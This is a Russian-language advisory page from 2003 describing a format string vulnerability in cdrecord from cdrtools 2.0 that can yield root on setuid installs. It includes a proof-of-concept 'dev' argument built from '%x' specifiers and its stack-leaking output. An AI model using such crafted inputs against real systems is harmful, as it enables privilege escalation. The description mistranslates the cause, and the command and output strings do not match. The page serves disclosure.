Уязвимость форматной строки в 'cdrtools' позволяет локальному пользователю получить поднятые привилегии

Дата публикации:
16.05.2003
Всего просмотров:
743
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость форматной строки обнаружена в 'cdrecord' в 'cdrtools' пакете. Локальный пользователь может получить поднятые привилегии на системе, включая root привилегии на некоторых дистрибутивах.

Сообщается, что libscg/scsiopen.c содержит уязвимость форматной строки в 273 строке, в которой функция js_snprintf() вызывается с надлежащей строкой форматирования. Локальный пользователь может установить параметр 'dev' к специально обработанному значению, чтобы эксплуатировать переполнение буфера и выполнить произвольный код с привилегиями, зависящими от дистрибутива. Согласно сообщению, в некоторых дистрибутивах программа конфигурирована с set user id (setuid) root привилегиями. Пример:

$ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c

Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jrg Schilling
scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
scsibus: -2 target: -2 lun: -2
Warning: Open by 'devname' is unintentional and not supported.
./cdrecord: File o directory inesistente. Cannot open
'AAAABBBBCCCC|65bffff6743808b7c8ffffffff000fffffffe4141414142424242.
Cannot open SCSI driver.

Уязвимость обнаружена в 'cdrtools' 2.0

Ссылки: cdrtools2.0 Format String Vulnerability

или введите имя

CAPTCHA